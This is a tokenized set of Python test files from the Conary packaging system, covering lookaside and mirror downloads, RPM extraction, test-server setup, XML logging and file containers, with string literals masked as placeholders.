<NUM_LIT:3> ] ) for x in lines <EOL> if x . startswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( badUrls , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> file ( logFile , "<STR_LIT>" ) <EOL> util . rmtree ( self . cacheDir , ignore_errors = True ) <EOL> trv = self . build ( recipestr % <EOL> dict ( rest = '<STR_LIT>' ) , "<STR_LIT>" ) <EOL> lines = [ x . strip ( ) for x in open ( logFile ) ] <EOL> self . assertEqual ( lines [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> badUrls = set ( '<STR_LIT:/>' . join ( x . split ( '<STR_LIT:/>' ) [ : <NUM_LIT:3> ] ) for x in lines <EOL> if x . 
startswith ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( badUrls , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> finally : <EOL> hs . close ( ) <EOL> def testMirrorLookaside ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> mirrorsDir = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> util . mkdirChain ( mirrorsDir ) <EOL> file ( os . path . join ( mirrorsDir , "<STR_LIT>" ) , "<STR_LIT:w>" ) . write ( <EOL> "<STR_LIT>" % <EOL> ( hs . port , hs . port ) ) <EOL> self . cfg . mirrorDirs = [ mirrorsDir ] <EOL> try : <EOL> trv = self . build ( recipestr , "<STR_LIT>" ) <EOL> self . assertEqual ( sorted ( [ x [ <NUM_LIT:1> ] for x in trv . iterFileList ( ) ] ) , <EOL> sorted ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) ) <EOL> lines = [ x . strip ( ) for x in open ( logFile ) ] <EOL> goodLines = [ x for x in lines if x . startswith ( '<STR_LIT>' ) <EOL> and x . endswith ( '<STR_LIT>' ) ] <EOL> self . assertEqual ( goodLines , <EOL> [ '<STR_LIT>' ] ) <EOL> goodLines = [ x for x in lines if x . endswith ( '<STR_LIT>' ) ] <EOL> self . assertEqual ( goodLines , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> finally : <EOL> hs . close ( ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> built , csf = self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> nvf = built [ <NUM_LIT:0> ] <EOL> nvf = repos . findTrove ( None , nvf ) [ <NUM_LIT:0> ] <EOL> fileDict = client . getFilesFromTrove ( * nvf ) <EOL> self . 
assertNotEquals ( fileDict [ '<STR_LIT>' ] . read ( ) , '<STR_LIT>' ) <EOL> rpmLookaside = open ( os . path . join ( self . cfg . lookaside , <EOL> '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:foo>' ) ) . read ( ) <EOL> self . assertEquals ( rpmLookaside , '<STR_LIT>' ) <EOL> fooLookasidePath = os . path . join ( self . cfg . lookaside , '<STR_LIT:foo>' , '<STR_LIT:foo>' ) <EOL> self . assertFalse ( os . path . exists ( fooLookasidePath ) , <EOL> "<STR_LIT>" ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside2 ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> built , csf = self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> nvf = built [ <NUM_LIT:0> ] <EOL> nvf = repos . findTrove ( None , nvf ) [ <NUM_LIT:0> ] <EOL> fileDict = client . getFilesFromTrove ( * nvf ) <EOL> self . assertNotEquals ( fileDict [ '<STR_LIT>' ] . read ( ) , '<STR_LIT>' ) <EOL> rpmLookaside = open ( os . path . join ( self . cfg . lookaside , <EOL> '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:foo>' ) ) . read ( ) <EOL> self . assertEquals ( rpmLookaside , '<STR_LIT>' ) <EOL> fooLookasidePath = os . path . join ( self . cfg . lookaside , '<STR_LIT:foo>' , '<STR_LIT:foo>' ) <EOL> self . assertEquals ( open ( fooLookasidePath ) . read ( ) , '<STR_LIT>' ) <EOL> self . assertEquals ( fileDict [ '<STR_LIT>' ] . read ( ) , '<STR_LIT>' ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside3 ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . 
get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> built , csf = self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> nvf = built [ <NUM_LIT:0> ] <EOL> nvf = repos . findTrove ( None , nvf ) [ <NUM_LIT:0> ] <EOL> fileDict = client . getFilesFromTrove ( * nvf ) <EOL> self . assertTrue ( '<STR_LIT>' in fileDict [ '<STR_LIT>' ] . read ( ) ) <EOL> self . assertTrue ( '<STR_LIT>' in fileDict [ '<STR_LIT>' ] . read ( ) ) <EOL> self . assertEquals ( set ( fileDict . keys ( ) ) , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> @ testhelp . context ( '<STR_LIT>' ) <EOL> def testRpmLookaside4 ( self ) : <EOL> recipeStr = """<STR_LIT>""" <EOL> self . addComponent ( '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , recipeStr ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , open ( os . path . join ( resources . get_archive ( ) , <EOL> '<STR_LIT>' ) ) . read ( ) ) ] ) <EOL> client = self . getConaryClient ( ) <EOL> repos = client . getRepos ( ) <EOL> err = self . assertRaises ( IOError , self . cookItem , repos , self . cfg , '<STR_LIT:foo>' ) <EOL> self . assertEquals ( str ( err ) , <EOL> '<STR_LIT>' ) <EOL> def testRepositoryCookNoDownload ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> repos = self . openRepository ( ) <EOL> logFile = os . path . join ( self . workDir , "<STR_LIT>" ) <EOL> hs = self . _getHTTPServer ( logFile ) <EOL> try : <EOL> origDir = os . getcwd ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( "<STR_LIT>" , recipestr % dict ( port = hs . port ) ) <EOL> self . addfile ( "<STR_LIT>" ) <EOL> self . discardOutput ( self . commit ) <EOL> self . assertEqual ( [ x . 
strip ( ) for x in file ( logFile ) ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> util . rmtree ( os . path . join ( self . cacheDir , "<STR_LIT>" ) ) <EOL> self . cookItem ( repos , self . cfg , '<STR_LIT:foo>' ) <EOL> self . assertEqual ( [ x . strip ( ) for x in file ( logFile ) ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> finally : <EOL> hs . close ( ) <EOL> os . chdir ( origDir ) <EOL> def test_extractFilesFromXzRPM ( self ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> raise testhelp . SkipTestException ( '<STR_LIT>' ) <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> trvs = [ x for x in built if x [ <NUM_LIT:0> ] == '<STR_LIT>' ] <EOL> trvs = [ ( x [ <NUM_LIT:0> ] , VFS ( x [ <NUM_LIT:1> ] ) , x [ <NUM_LIT:2> ] ) for x in trvs ] <EOL> repos = self . openRepository ( ) <EOL> trv = repos . getTroves ( trvs ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( <EOL> sorted ( os . path . basename ( p [ <NUM_LIT:1> ] ) for p in trv . iterFileList ( ) ) , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) </s>
<s> import errno <EOL> import os <EOL> import sys <EOL> from conary . lib import util <EOL> from testutils . servers . gunicorn_server import GunicornServer <EOL> from testutils . servers . uwsgi_server import UwsgiServer <EOL> from testutils . servers . nginx_server import NginxServer <EOL> from conary_test import resources <EOL> class ConaryServer ( object ) : <EOL> cache = None <EOL> reposDB = None <EOL> appServerClasses = { <EOL> '<STR_LIT>' : GunicornServer , <EOL> '<STR_LIT>' : UwsgiServer , <EOL> } <EOL> def __init__ ( self , reposDir , <EOL> sslCertAndKey = None , <EOL> withCache = True , <EOL> singleWorker = False , <EOL> configValues = ( ) , <EOL> ) : <EOL> self . reposDir = os . path . abspath ( reposDir ) <EOL> self . reposLog = os . path . join ( self . reposDir , '<STR_LIT>' ) <EOL> self . traceLog = os . path . join ( self . reposDir , '<STR_LIT>' ) <EOL> self . configPath = os . path . join ( self . reposDir , '<STR_LIT>' ) <EOL> self . contents = ContentStore ( os . path . join ( self . reposDir , '<STR_LIT>' ) ) <EOL> if withCache : <EOL> self . cache = ContentStore ( os . path . join ( self . reposDir , '<STR_LIT>' ) ) <EOL> self . cache . reset ( ) <EOL> self . sslCertAndKey = sslCertAndKey <EOL> if sslCertAndKey is True : <EOL> self . sslCertAndKey = ( <EOL> resources . get_archive ( '<STR_LIT>' ) , <EOL> resources . get_archive ( '<STR_LIT>' ) ) <EOL> name = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> appServerClass = self . appServerClasses [ name ] <EOL> self . appServer = appServerClass ( <EOL> serverDir = os . path . join ( self . reposDir , '<STR_LIT>' ) , <EOL> workers = ( <NUM_LIT:1> if singleWorker else <NUM_LIT:2> ) , <EOL> application = '<STR_LIT>' , <EOL> environ = { <EOL> '<STR_LIT>' : self . configPath , <EOL> } , <EOL> ) <EOL> self . rpServer = NginxServer ( <EOL> serverDir = os . path . join ( self . reposDir , '<STR_LIT>' ) , <EOL> proxyTo = self . appServer . getProxyTo ( ) , <EOL> sslCertAndKey = self . 
sslCertAndKey , <EOL> ) <EOL> self . configValues = configValues <EOL> self . needsReset = True <EOL> def reset ( self ) : <EOL> self . checkForTracebacks ( ) <EOL> for thing in ( <EOL> self . appServer , <EOL> self . rpServer , <EOL> self . contents , <EOL> self . reposDB , <EOL> self . cache , <EOL> ) : <EOL> if thing : <EOL> thing . reset ( ) <EOL> self . needsReset = False <EOL> def resetIfNeeded ( self ) : <EOL> if self . needsReset : <EOL> self . reset ( ) <EOL> def setNeedsReset ( self ) : <EOL> self . needsReset = True <EOL> def start ( self ) : <EOL> self . needsReset = True <EOL> self . createConfig ( ) <EOL> self . appServer . start ( ) <EOL> self . rpServer . start ( ) <EOL> def stop ( self ) : <EOL> self . checkForTracebacks ( ) <EOL> self . rpServer . stop ( ) <EOL> self . appServer . stop ( ) <EOL> def checkForTracebacks ( self ) : <EOL> try : <EOL> with open ( self . appServer . errorLog ) as f : <EOL> data = f . read ( ) <EOL> if '<STR_LIT>' in data : <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> print >> sys . stderr , data <EOL> sys . stderr . flush ( ) <EOL> except IOError , err : <EOL> if err . args [ <NUM_LIT:0> ] != errno . ENOENT : <EOL> raise <EOL> def createConfig ( self , defaultValues = ( ) ) : <EOL> configValues = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' + self . traceLog , <EOL> '<STR_LIT>' : self . reposLog , <EOL> '<STR_LIT>' : self . reposDir , <EOL> } <EOL> if self . cache : <EOL> configValues [ '<STR_LIT>' ] = self . cache . getPath ( ) <EOL> configValues . update ( defaultValues ) <EOL> configValues . update ( self . configValues ) <EOL> util . mkdirChain ( os . path . dirname ( self . configPath ) ) <EOL> with open ( self . configPath , '<STR_LIT:w>' ) as f : <EOL> for key , values in configValues . 
iteritems ( ) : <EOL> if values is None : <EOL> continue <EOL> if not isinstance ( values , list ) : <EOL> values = [ values ] <EOL> for value in values : <EOL> print >> f , key , value <EOL> def getUrl ( self , ssl = True ) : <EOL> return self . rpServer . getUrl ( ssl = ssl ) + '<STR_LIT>' <EOL> class RepositoryServer ( ConaryServer ) : <EOL> def __init__ ( self , reposDir , nameList , reposDB , ** kwargs ) : <EOL> ConaryServer . __init__ ( self , reposDir , ** kwargs ) <EOL> if isinstance ( nameList , str ) : <EOL> nameList = [ nameList ] <EOL> self . nameList = nameList <EOL> self . reposDB = reposDB <EOL> self . needsPGPKey = True <EOL> def getMap ( self , ssl = True ) : <EOL> dest = self . getUrl ( ssl = ssl ) <EOL> d = dict ( ( name , dest ) for name in self . nameList ) <EOL> return d <EOL> def getName ( self ) : <EOL> return self . nameList [ <NUM_LIT:0> ] <EOL> def reset ( self ) : <EOL> super ( RepositoryServer , self ) . reset ( ) <EOL> self . needsPGPKey = True <EOL> def clearNeedsPGPKey ( self ) : <EOL> self . needsPGPKey = False <EOL> def createConfig ( self , defaultValues = ( ) ) : <EOL> configValues = { <EOL> '<STR_LIT>' : self . contents . path , <EOL> '<STR_LIT>' : self . reposDB . getDriver ( ) , <EOL> '<STR_LIT>' : "<STR_LIT:U+0020>" . join ( self . nameList ) , <EOL> } <EOL> configValues . update ( defaultValues ) <EOL> super ( RepositoryServer , self ) . createConfig ( defaultValues = configValues ) <EOL> class ProxyServer ( ConaryServer ) : <EOL> def __init__ ( self , reposDir , ** kwargs ) : <EOL> kwargs . setdefault ( '<STR_LIT>' , True ) <EOL> ConaryServer . __init__ ( self , reposDir , ** kwargs ) <EOL> def createConfig ( self , defaultValues = ( ) ) : <EOL> configValues = { <EOL> '<STR_LIT>' : self . contents . path , <EOL> } <EOL> configValues . update ( defaultValues ) <EOL> super ( ProxyServer , self ) . createConfig ( defaultValues = configValues ) <EOL> def addToConfig ( self , configObj ) : <EOL> configObj . 
configLine ( '<STR_LIT>' + <EOL> self . rpServer . getUrl ( ssl = False ) ) <EOL> if self . sslCertAndKey : <EOL> configObj . configLine ( '<STR_LIT>' + <EOL> self . rpServer . getUrl ( ssl = True ) ) <EOL> else : <EOL> configObj . configLine ( '<STR_LIT>' + <EOL> self . rpServer . getUrl ( ssl = False ) ) <EOL> class ContentStore ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = os . path . abspath ( path ) <EOL> def reset ( self ) : <EOL> util . rmtree ( self . path , ignore_errors = True ) <EOL> util . mkdirChain ( self . path ) <EOL> def getPath ( self ) : <EOL> return self . path </s>
<s> from testrunner import testhelp <EOL> import bz2 <EOL> import gzip <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> import threading <EOL> import time <EOL> from conary . lib import xmllog , util , log , logger <EOL> class XmlLogParseTest ( testhelp . TestCase ) : <EOL> def setUp ( self ) : <EOL> fd , self . logfile = tempfile . mkstemp ( ) <EOL> os . close ( fd ) <EOL> self . hdlr = xmllog . XmlHandler ( self . logfile ) <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> self . logger . setLevel ( <NUM_LIT:1> ) <EOL> self . logger . addHandler ( self . hdlr ) <EOL> testhelp . TestCase . setUp ( self ) <EOL> def tearDown ( self ) : <EOL> self . hdlr . close ( ) <EOL> self . logger . handlers . remove ( self . hdlr ) <EOL> util . rmtree ( self . logfile ) <EOL> testhelp . TestCase . tearDown ( self ) <EOL> def getLogData ( self ) : <EOL> self . hdlr . flush ( ) <EOL> return open ( self . logfile ) . read ( ) <EOL> def assertSubstring ( self , substr , data ) : <EOL> self . assertFalse ( substr not in data , <EOL> "<STR_LIT>" % ( substr , data ) ) <EOL> def testBasicAttributes ( self ) : <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) <EOL> self . assertFalse ( '<STR_LIT>' in data , <EOL> "<STR_LIT>" ) <EOL> for messageId in ( <NUM_LIT:0> , <NUM_LIT:1> ) : <EOL> self . assertSubstring ( '<STR_LIT>' % messageId , data ) <EOL> record = data . splitlines ( ) [ - <NUM_LIT:1> ] <EOL> self . assertFalse ( not record . startswith ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( not record . endswith ( '<STR_LIT>' ) ) <EOL> for kw in ( '<STR_LIT>' , '<STR_LIT:message>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' ) : <EOL> self . assertSubstring ( "<STR_LIT>" % kw , record ) <EOL> self . assertSubstring ( "<STR_LIT>" % kw , record ) <EOL> def testDescriptor ( self ) : <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:test>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT>' ) <EOL> self . logger . 
info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . hdlr . popDescriptor ( ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testRecordData ( self ) : <EOL> self . hdlr . addRecordData ( '<STR_LIT>' , <NUM_LIT> ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . assertRaises ( RuntimeError , self . hdlr . addRecordData , '<STR_LIT>' , '<STR_LIT:key>' ) <EOL> self . hdlr . addRecordData ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . hdlr . delRecordData ( '<STR_LIT>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertFalse ( '<STR_LIT>' in data [ - <NUM_LIT:1> ] , "<STR_LIT>" ) <EOL> def testTimeFormat ( self ) : <EOL> self . mock ( time , '<STR_LIT:time>' , lambda : <NUM_LIT> ) <EOL> ts = logger . getTime ( ) <EOL> self . assertEquals ( ts , '<STR_LIT>' ) <EOL> self . unmock ( ) <EOL> def testThreadName ( self ) : <EOL> class Foo ( threading . Thread ) : <EOL> def run ( x ) : <EOL> self . logger . info ( '<STR_LIT>' ) <EOL> foo = Foo ( ) <EOL> foo . start ( ) <EOL> foo . join ( ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testThreadData ( self ) : <EOL> class Foo ( threading . Thread ) : <EOL> def run ( x ) : <EOL> self . hdlr . 
addRecordData ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> foo = Foo ( ) <EOL> foo . start ( ) <EOL> foo . join ( ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testThreadDescriptor ( self ) : <EOL> class Foo ( threading . Thread ) : <EOL> def run ( x ) : <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:bar>' ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> foo = Foo ( ) <EOL> foo . start ( ) <EOL> foo . join ( ) <EOL> data = self . getLogData ( ) . splitlines ( ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:1> ] ) <EOL> def testMakeRecord ( self ) : <EOL> record = logger . makeRecord ( { '<STR_LIT:foo>' : '<STR_LIT:bar>' , '<STR_LIT:test>' : '<STR_LIT>' , '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> self . assertEquals ( record , <EOL> "<STR_LIT>" ) <EOL> def testClose ( self ) : <EOL> self . hdlr . close ( ) <EOL> self . logger . handlers . remove ( self . hdlr ) <EOL> data = open ( self . logfile ) . read ( ) . splitlines ( ) <EOL> self . hdlr = xmllog . XmlHandler ( self . logfile ) <EOL> self . logger . addHandler ( self . hdlr ) <EOL> self . assertEquals ( len ( data ) , <NUM_LIT:5> ) <EOL> self . assertEquals ( data [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> def testFmtdLog ( self ) : <EOL> tmpDir = tempfile . mkdtemp ( ) <EOL> try : <EOL> origHandlers = log . fmtLogger . handlers [ : ] <EOL> logPath = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> log . openFormattedLog ( logPath ) <EOL> log . pushLogDescriptor ( '<STR_LIT:foo>' ) <EOL> self . captureOutput ( log . debug , '<STR_LIT>' ) <EOL> log . pushLogDescriptor ( '<STR_LIT:bar>' ) <EOL> self . captureOutput ( log . info , '<STR_LIT>' ) <EOL> log . popLogDescriptor ( ) <EOL> self . captureOutput ( log . 
warning , '<STR_LIT>' ) <EOL> log . popLogDescriptor ( ) <EOL> self . captureOutput ( log . error , '<STR_LIT>' ) <EOL> log . pushLogDescriptor ( '<STR_LIT>' ) <EOL> hdlr = [ x for x in log . fmtLogger . handlers if x not in origHandlers ] [ <NUM_LIT:0> ] <EOL> hdlr . close ( ) <EOL> log . fmtLogger . handlers . remove ( hdlr ) <EOL> data = open ( logPath ) . read ( ) . splitlines ( ) <EOL> self . assertFalse ( '<STR_LIT>' in data [ - <NUM_LIT:2> ] , <EOL> "<STR_LIT>" ) <EOL> self . assertEquals ( data [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> self . assertEquals ( len ( data ) , <NUM_LIT:9> ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ <NUM_LIT:2> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ <NUM_LIT:2> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> finally : <EOL> util . rmtree ( tmpDir ) <EOL> def testDescriptorPop ( self ) : <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . popDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:foo>' ) <EOL> self . hdlr . pushDescriptor ( '<STR_LIT:bar>' ) <EOL> self . hdlr . popDescriptor ( '<STR_LIT:bar>' ) <EOL> self . assertRaises ( AssertionError , self . hdlr . popDescriptor , '<STR_LIT:bar>' ) <EOL> def testCompressedLogs ( self ) : <EOL> tmpDir = tempfile . mkdtemp ( ) <EOL> try : <EOL> bz2Path = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> bz2Hdlr = xmllog . XmlHandler ( bz2Path ) <EOL> self . logger . addHandler ( bz2Hdlr ) <EOL> gzPath = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> gzHdlr = xmllog . XmlHandler ( gzPath ) <EOL> self . logger . addHandler ( gzHdlr ) <EOL> logPath = os . path . join ( tmpDir , '<STR_LIT>' ) <EOL> logHdlr = xmllog . XmlHandler ( logPath ) <EOL> self . logger . addHandler ( logHdlr ) <EOL> self . logger . info ( '<STR_LIT:test>' ) <EOL> bz2Hdlr . close ( ) <EOL> gzHdlr . close ( ) <EOL> logHdlr . 
close ( ) <EOL> self . logger . handlers . remove ( bz2Hdlr ) <EOL> self . logger . handlers . remove ( gzHdlr ) <EOL> self . logger . handlers . remove ( logHdlr ) <EOL> logData = open ( logPath ) . read ( ) . splitlines ( ) [ : <NUM_LIT:2> ] <EOL> gzData = gzip . GzipFile ( gzPath , '<STR_LIT:r>' ) . read ( ) . splitlines ( ) [ : <NUM_LIT:2> ] <EOL> bzData = bz2 . BZ2File ( bz2Path , '<STR_LIT:r>' ) . read ( ) . splitlines ( ) [ : <NUM_LIT:2> ] <EOL> self . assertFalse ( not logData , "<STR_LIT>" ) <EOL> self . assertEquals ( logData , gzData ) <EOL> self . assertEquals ( logData , bzData ) <EOL> finally : <EOL> util . rmtree ( tmpDir ) <EOL> def testCloseData ( self ) : <EOL> self . hdlr . addRecordData ( '<STR_LIT:foo>' , '<STR_LIT:bar>' ) <EOL> self . hdlr . close ( ) <EOL> self . logger . handlers . remove ( self . hdlr ) <EOL> data = open ( self . logfile ) . read ( ) . splitlines ( ) <EOL> self . hdlr = xmllog . XmlHandler ( self . logfile ) <EOL> self . logger . addHandler ( self . hdlr ) <EOL> self . assertSubstring ( '<STR_LIT>' , data [ - <NUM_LIT:2> ] ) <EOL> self . assertFalse ( '<STR_LIT>' in data [ - <NUM_LIT:2> ] , <EOL> "<STR_LIT>" ) <EOL> def testEscapedNewlines ( self ) : <EOL> self . logger . info ( '<STR_LIT>' ) <EOL> data = self . getLogData ( ) <EOL> lastline = data . splitlines ( ) [ - <NUM_LIT:1> ] <EOL> self . assertFalse ( not lastline . startswith ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) </s>
<s> import os <EOL> import gzip <EOL> import tempfile <EOL> import unittest <EOL> from conary . lib import util <EOL> from conary . repository import filecontainer <EOL> from conary . repository . filecontainer import FileContainer <EOL> from conary . repository . filecontents import FromFile , FromString <EOL> def fileCount ( ) : <EOL> l = os . listdir ( "<STR_LIT>" % os . getpid ( ) ) <EOL> return len ( l ) - <NUM_LIT:1> <EOL> def checkFiles ( c , names , data , tags ) : <EOL> names = names [ : ] <EOL> i = <NUM_LIT:0> <EOL> rc = c . getNextFile ( ) <EOL> while rc : <EOL> name , tag , f = rc <EOL> assert ( name == names [ <NUM_LIT:0> ] ) <EOL> del names [ <NUM_LIT:0> ] <EOL> s = gzip . GzipFile ( None , "<STR_LIT:r>" , fileobj = f ) . read ( ) <EOL> if s != data [ i ] : <EOL> raise AssertionError , "<STR_LIT>" % names [ i ] <EOL> if tag != tags [ i ] : <EOL> raise AssertionError , "<STR_LIT>" % names [ i ] <EOL> i += <NUM_LIT:1> <EOL> rc = c . getNextFile ( ) <EOL> if names : <EOL> raise AssertionError , "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( names ) <EOL> class FilecontainerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> fd , self . fn = tempfile . mkstemp ( ) <EOL> def test ( self ) : <EOL> count = fileCount ( ) <EOL> f = util . ExtendedFile ( "<STR_LIT>" , "<STR_LIT:r>" , buffering = False ) <EOL> self . assertRaises ( filecontainer . BadContainer , FileContainer , f ) <EOL> f . close ( ) <EOL> if ( count != fileCount ( ) ) : <EOL> raise AssertionError , "<STR_LIT>" % count <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> c . close ( ) <EOL> data = [ ] <EOL> tags = [ ] <EOL> names = [ ] <EOL> c = FileContainer ( f ) <EOL> self . assertRaises ( AssertionError , c . addFile , "<STR_LIT:name>" , <EOL> FromString ( "<STR_LIT:data>" ) , "<STR_LIT>" ) <EOL> c . close ( ) <EOL> os . unlink ( self . fn ) <EOL> f = util . ExtendedFile ( self . 
fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> data . append ( "<STR_LIT>" ) <EOL> tags . append ( "<STR_LIT>" ) <EOL> names . append ( "<STR_LIT>" ) <EOL> c . addFile ( names [ <NUM_LIT:0> ] , FromString ( data [ <NUM_LIT:0> ] ) , tags [ <NUM_LIT:0> ] ) <EOL> data . append ( "<STR_LIT>" ) <EOL> tags . append ( "<STR_LIT>" ) <EOL> names . append ( "<STR_LIT>" ) <EOL> c . addFile ( names [ <NUM_LIT:1> ] , FromString ( data [ <NUM_LIT:1> ] ) , tags [ <NUM_LIT:1> ] ) <EOL> data . append ( "<STR_LIT>" ) <EOL> tags . append ( "<STR_LIT>" ) <EOL> names . append ( "<STR_LIT>" ) <EOL> c . addFile ( names [ <NUM_LIT:2> ] , FromString ( data [ <NUM_LIT:2> ] ) , tags [ <NUM_LIT:2> ] ) <EOL> c . close ( ) <EOL> c = FileContainer ( f ) <EOL> checkFiles ( c , names , data , tags ) <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) <EOL> c = FileContainer ( f ) <EOL> checkFiles ( c , names , data , tags ) <EOL> c . reset ( ) <EOL> checkFiles ( c , names , data , tags ) <EOL> c . close ( ) <EOL> f = util . ExtendedFile ( self . fn , "<STR_LIT>" , buffering = False ) 